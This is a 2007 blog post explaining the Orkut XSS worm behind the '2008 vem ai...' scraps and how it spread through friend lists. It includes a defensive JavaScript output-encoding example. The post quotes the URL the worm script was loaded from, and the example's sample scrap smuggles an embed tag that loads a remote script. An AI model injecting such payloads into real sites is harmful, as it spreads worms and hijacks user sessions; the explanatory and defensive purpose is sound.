Microsoft Anti Virus


Tuesday, 18 December 2007

Orkut XSS attack - that "2008 vem ai... que ele comece mto bem para vc" thingie

Posted on 20:04 by Unknown


A lot of you have probably been wondering how you received a scrap saying "2008 vem ai... que ele comece mto bem para vc" from me, or possibly from some friend of yours.



It's called an XSS attack, or cross-site scripting attack. A piece of JavaScript code is executed on the client side (that is, in your browser) when you log into your Orkut scrapbook and read a scrap carrying the malicious code. The scrap comes from a friend's account whose Orkut session has already been infected; the spam message is its visible text, and once the code runs in your session it starts scrapping everyone in your friend list.

In short: when someone sends you a spam scrap and you read it, the same scrap is sent to your friends from your account. This will keep spreading for the coming few days, probably until Orkut takes some measures.

Steps you can take:

If possible, change your Gmail account password and do not log in to Orkut until they sort this out.



Courtesy: Antrix.net (find link in comments)

The script is fetched from here: http://files.myopera.com/virusdoorkut/files/virus.js




The Orkut website is built on ASP.NET; if you wish to read the technical side of preventing XSS attacks in ASP.NET, go here.
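The worm described above works because scrap text is placed into the scrapbook page as live HTML; the prevention this paragraph points to is output encoding at render time. As an added example (not from this post, and not Orkut's code), here is that fix in plain JavaScript, beside a naive tag-stripping "fix" to show why it is not enough. The function names, the sample scrap and the example.invalid URL are assumptions.

```javascript
// Added example: output encoding for user-supplied scrap text (Node.js, no deps).
// Names (encodeHtml, renderScrap, stripScriptTags, checkScrap) are assumptions.

// Encode the five characters that can change HTML context. The template below
// quotes its attribute values, so this is sufficient for text and attributes.
function encodeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[ch]);
}

// Render a scrap the way a scrapbook page should: every untrusted field is
// encoded at the exact point it is placed into HTML.
function renderScrap(scrap) {
  return `<div class="scrap" data-from="${encodeHtml(scrap.fromUserId)}">` +
         `<b>${encodeHtml(scrap.fromName)}</b>: ${encodeHtml(scrap.body)}</div>`;
}

// A naive "fix" that only removes <script> tags. Shown here because script can
// also be loaded through other tags (embed, object, iframe) or event handlers.
function stripScriptTags(text) {
  return String(text).replace(/<\/?script[^>]*>/gi, '');
}

// Check (not a sanitizer): does the HTML still carry an active tag or an
// inline on*= event handler? Used only to verify the two approaches.
function containsActiveContent(html) {
  return /<\s*(script|embed|object|iframe)\b|\son\w+\s*=/i.test(html);
}

// Compare strip-only vs. encode-at-render for one scrap.
function checkScrap(scrap) {
  const html = renderScrap(scrap);
  return {
    html,
    stripOnlyStillActive: containsActiveContent(stripScriptTags(scrap.body)),
    encodedStillActive: containsActiveContent(html),
  };
}

// Constructed sample: a scrap whose body smuggles a loader tag (placeholder URL).
const SAMPLE_SCRAP = {
  fromUserId: '12345',
  fromName: 'friend',
  body: '2008 vem ai... <embed src="http://example.invalid/virus.js" type="application/x-shockwave-flash">',
};
```

Run `checkScrap(SAMPLE_SCRAP)`: the strip-only path still contains the `<embed>` tag, while the encoded render shows it as harmless text.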



Update:

1.) The problem seems to have been sorted out by Orkut in 2 days (that's long).

2.) 400,000 users affected.

3.) Top users affected by country: US, Germany, India, Brazil.

4.) Orkut has still not accepted that it was a mistake on their side. The official Orkut blog is still mum on the incident.

5.) Your password is safe, though it would have been possible to steal your Gmail password if, say, the virus had redirected you to a page that looked exactly like Orkut and asked you to log in again.



Posted in Google, Internet, Observations, Rumours | No comments